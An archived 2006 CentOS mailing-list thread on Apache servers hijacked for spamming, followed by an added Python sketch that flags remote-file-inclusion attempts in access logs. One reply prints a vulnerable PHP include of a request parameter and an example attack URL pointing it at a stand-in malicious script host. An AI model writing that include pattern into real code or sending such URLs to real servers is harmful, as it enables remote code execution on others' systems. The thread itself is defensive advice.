[CentOS] Apache Security
Charles Lacroix
clacroix at cegep-ste-foy.qc.ca
Thu Jun 22 17:30:42 UTC 2006
On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
> > Hello, I have a server running CentOS 4.3 with all the latest updates.
> > The server in question has been hacked by spammers a few times. The
> > details of the hack have been basically the same every time. I find some
> > directory created by the apache user account in /tmp. The new directory
> > contains an html file, and a list of email addresses to spam and a perl
> > script that spams all those email addresses with the html file.
> >
> > My question is why is this happening? Obviously it's some apache
> > exploit. I have removed mod_perl, that didn't help. I have now changed
> > the permissions on the perl executable, that might help we will see, but
> > that doesn't address the core problem. How is it that someone can upload
> > arbitrary files to my server and then execute an arbitrary command via
> > apache.
> >
> > Is this a known problem? Have others seen it? What can I do to help
> > prevent this?
>
> I've also been hacked a couple of times with this sort of exploit. In my
> case, it was an exploit in awstats, a weblog analyser. If you have it, I
> strongly suggest you get up to the latest version...
>
> Also, if you have php scripts installed, they are a frequent source of
> security holes.
>
> Nicolas
All the hacks I've seen on my webservers were a combination of bad programming
in php scripts and allow_url_fopen.
I've seen things like:
else {
    include $_REQUEST["param"];
}
So one could simply modify a URL:
http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php
From there you can put any local exploit code in script.php.
Disabling the allow_url_fopen will help you secure this a bit.
Just check your Apache logs; you should be able to find interesting information
in there.
I've seen this quite a few times.
I hope this can help someone.
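
An added example, not part of the original post: a Python sketch of the log check suggested above, flagging access-log requests in which a query parameter's value is itself a remote URL, the pattern shown for bad-script.php. The log lines are constructed samples, and the function and variable names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log line: client, timestamp, "METHOD target PROTO", status
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL, which include() will fetch
# when allow_url_fopen is enabled
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2006:13:02:11 -0400] "GET /bad-script.php'
    '?param=http://link.to.a.malicious.script/script.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Jun/2006:13:02:40 -0400] "GET /bad-script.php'
    '?param=http%3A%2F%2Fremote.example%2Fscript.php HTTP/1.1" 200 498',
    '192.0.2.12 - - [22/Jun/2006:13:03:05 -0400] "GET /index.php'
    '?page=about HTTP/1.1" 200 2048',
    '192.0.2.13 - - [22/Jun/2006:13:03:09 -0400] "GET /images/logo.png'
    ' HTTP/1.1" 304 -',
]


def find_remote_includes(lines):
    """Return (client, path, param, value, status) for every query parameter
    whose decoded value starts with http://, https:// or ftp://."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        target = urlsplit(m.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded values
            decoded = unquote(value)
            if REMOTE_RE.match(decoded):
                hits.append((m.group("client"), target.path, name,
                             decoded, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print("%s %s %s=%s -> HTTP %d" % hit)
```

$_REQUEST also reads POST bodies and cookies, which the access log does not record, so an empty result does not rule out this kind of request. Scripts that legitimately take a URL as a parameter will also be flagged and need to be reviewed by hand.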